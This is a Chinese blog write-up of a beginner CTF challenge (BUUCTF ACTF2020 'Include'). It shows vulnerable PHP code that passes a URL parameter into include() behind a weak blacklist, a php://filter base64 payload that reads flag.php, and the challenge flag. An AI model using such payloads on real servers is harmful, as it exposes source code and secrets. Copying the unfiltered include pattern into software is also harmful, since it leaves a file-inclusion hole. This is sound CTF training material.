buuctf-web-[ACTF2020 新生赛]Include1

最新推荐文章于 2024-08-28 22:22:22 发布
最新推荐文章于 2024-08-28 22:22:22 发布
阅读量869 收藏 1
点赞数
分类专栏: ctf buuctfweb 文章标签: 前端 php servlet 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/126023117
版权
"本文介绍了一种通过PHP文件包含漏洞,利用base64编码解码技巧获取flag的过程,展示了如何绕过输入过滤,最终揭示了flag:flag{a26fe8e9-9e84-4b87-a88e-7f4821684fec}
摘要由CSDN通过智能技术生成

一看题目就是利用文件包含

打开环境,点击tips

 

链接有一个file传参,可以利用php://filter对文件内容进行读取

?file=php://filter/read=convert.base64-encode/resource=index.php

 

base64解码一下

<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

 对input,zip,phar协议进行了过滤,所以就是利用filter进行内容读取

?file=php://filter?read=convert.base64-encode/resource=flag.php

 

同样base64解码一下

<?php
echo "Can you find out the flag?";
//flag{a26fe8e9-9e84-4b87-a88e-7f4821684fec}

 获得flag

flag{a26fe8e9-9e84-4b87-a88e-7f4821684fec}

mlws1900
关注
专栏目录
BUUCTF__[ACTF2020 新生]Include_题解
风过江南乱的博客
06-26 2202
BUUCTF__[ACTF2020 新生]Include_题解
[ACTF2020 新生]Include1
weixin_64160292的博客
03-31 5268
题目:[ACTF2020 新生]Include1 题目来源:buuctf 过程分析: 1、首先看到一个tips,我们打开看看 然后从题目我们知道这个是一个文件包含题,对文件进行php伪协议检测 伪协议 php://input:用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。 条件: php <5.0 ,allow_url_include=Off 情况下也可以用 php > 5.0,只有在allow_url_fope
BUUCTF WEB [ACTF2020 新生]Include1 做题记录
m0_47083622的博客
07-14 293
点击靶场发现tips 点击tips发现?file=flag.php 从?file=flag.php可知该题考的是文件包含中的php伪协议,用php伪协议来读取flag.php中的内容 输入http://ad26d939-e68e-498a-b725-1f7ad299e24b.node4.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php得到Base64编码 用Base64解...
web buuctf [ACTF2020 新生]Include1
weixin_44214568的博客
08-04 547
1.线索:查看tips页面源代码,只有一个标签传参链接?file=flag.php; 点击查看传参后几面源代码,网页上只有“Can you find out the flag?”一句话 2.分析:没有sql注入点 提示can you find out the flag,且传递的file是flag.php flag是否在flag.php中 尝试查看一下flag.php代码 3.知识储备: php...
BUUCTF--[ACTF2020 新生]Include 1
weixin_45674567的博客
05-20 940
点击 tips 根据题目名字和这个/?file=flag.php就知道是文件包含题了,用php伪协议读取flag.php的内容 payload:file=php://filter/read=convert.base64-encode/resource=flag.php
BUUCTF Web [ACTF2020 新生]Include
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Include一、题目简介二、思路分析三、解题步骤1)包含 flag.php2)PHP伪协议编码文件3)解码文件内容四、总结 一、题目简介 进入题目链接后只有一个「链接」 点击链接后来到 falg.php 页面,里面是一句作者深情的「问候」。 二、.
BUUCTF之[ACTF2020 新生]Include
weixin_44632787的博客
06-13 441
BUUCTF之[ACTF2020 新生]Include 启动项目,进入到我们的挑战页面 这个有个tips链接,点开它 发现并没有什么可用的信息,然后试试右键打开源代码和访问robots.txt协议都没有看到什么特别的信息。然后就开始想是不是该用dirsearch扫描一下这个网址看看可不可以扫描出什么来。但是又返回到题目去,看到了Include这个字眼。就想起了,这个题目可能是和文件包含相关。。。 打开火狐的Hackbar,导入链接emmmmmmmmmm 好的,那么现在开始输入文件包含里经常用到的方
BUU 【ACTF2020 新生Include 1 解题大致思路
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-14 1143
1.首先打开靶场环境 看到链接tips 打开tips 2.
[ACTF2020 新生]BackupFile 1
qq_43618536的博客
07-02 657
BUUCTF的[ACTF2020 新生]BackupFile 1
[BUUCTF007] [ACTF2020 新生]Include
m0_52674595的博客
12-02 5311
[BUUCTF007] [ACTF2020 新生]Include 打开后看到这个 先点击 看到是打开了一个叫做flag.php的文件 但是并没有想要的flag 检查元素或查看源代码并没有收获 分析得 该题为: 使用文件包含漏洞读取网页代码 文件包含漏洞: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞肯能会造成服务器网页被篡改、网站被挂马、服务器被远程控制、被安装后
BUUCTF】[ACTF2020 新生]Include1
weixin_61970418的博客
12-09 530
我们利用php伪协议中的php://filter进行读取flag.php并进行base64编码输出,否则会被当做php代码执行,而被隐藏,完整代码为。会输出一段base64编码,任意选择方式进行解码即可,我刚好开着burp,用burp中的解码器进行解码,就得到了flag。出现了一句话,Can you find the flag?,url也出现了变化,出现了?右键页面源代码,并没有出现flag。打开靶机,只有一个超链,点击。
BUUCTF——[ACTF2020 新生]Include 1
小白一枚多多关注的博客
03-17 269
这道题呢,啧,有点点难度,可谓是buuctf越到后面越难,这道题主要考的是大家对协议的熟悉程度,这里用到的是filter协议,所以下面就是图文演示了 这里就得到flag了,这里用到的解密方法是bash64解密,各位小伙伴们快去试试吧 ...
BUUCTF WEB INCLUDE &&Ping Ping Ping
m0_46315342的博客
08-20 794
BUUCTF WEB INCLUDE 进去之后看到的是这样的,然后点击链接, 在这里试一下php伪协议,构造URL为 http://1ec44303-73b4-47c1-b74e-764c7f147d6f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php 得到 拿去解压之后可以达到: <?php echo "Can you find out the flag?"; //flag{672214de-
BUUCTFACTF2020 新生Include1 write up
GZWZ_的博客
03-30 3082
鉴于前几篇wp写的有些过于小白,我以后会改的┭┮﹏┭┮(web本就逆天,死在路上很正常)!
BUUCTF[ACTF2020 新生]Include 1
最新发布
qq_44761422的博客
08-28 221
F12看源代码php伪协议。
buuctf-Include
xixihahawuwu的博客
11-23 1326
打开题目环境,就看到一个tips 点击 先回之前界面看看源码 线索这不就来了吗 … 这就是粗心的下场…浪费时间了 看下源码 源码啥都没有 突然觉得这题好熟悉的说 上题不也是给出了flag.php但是直接连接却没有内容吗,想着会不会又是php伪协议 毕竟这两道题是连在一起的(咳咳,不太明白的可以去看我的上一个博客,我可没有要你们给我增加浏览量的意思哈) 按照上题的格式试一下 ?file=php://filter/read=convert.base64-encode/resource=flag.p.
BUUCTF-[ACTF2020 新生]Include1
qq_62875941的博客
12-26 562
本题主要考查的是php伪协议进行文件包含 进入本题之前先来认识一下常见的三种方法 1.php://filter 读取文件源码 2.php://input 任意代码执行 3.data://text/plain 任意代码执行 下面我们回到本题 打开链接,点击tips 首先考虑使用php://input任意代码执行 发现直接被题目过滤了 于是我们考虑使用php://filter读取文件源码的方法 构造playload ?file=php://filter/read=co...
今天我们来做一下BuuCTF里面的include 1
qq_51802152的博客
12-25 226
对于我们这种初学者每做一道题都得需要查询大量的资料,希望屁股门能尽快上岸吧
BUUCTF-[ACTF2020 新生]Include 1
ITgougou_的博客
12-23 297
本题主要考查了利用php://filter伪协议进行文件包含 进入题目根据Tip进入正题,可以看到URL中存在文件包含(题目名也很直接) 首先考虑"php://input"伪协议 + POST发送PHP代码的经典套路 重新考虑之后使用"php://filter"伪协议"来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码...
[ACTF2020 新生]Include 1
09-19
[ACTF2020 新生]Include 1是一道与PHP文件包含漏洞相关的题目。根据提供的引用内容,代码中对$file参数进行了过滤,防止了一些常见的恶意输入。但是通过引用中给出的payload,可以绕过输入的过滤,进一步读取flag....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值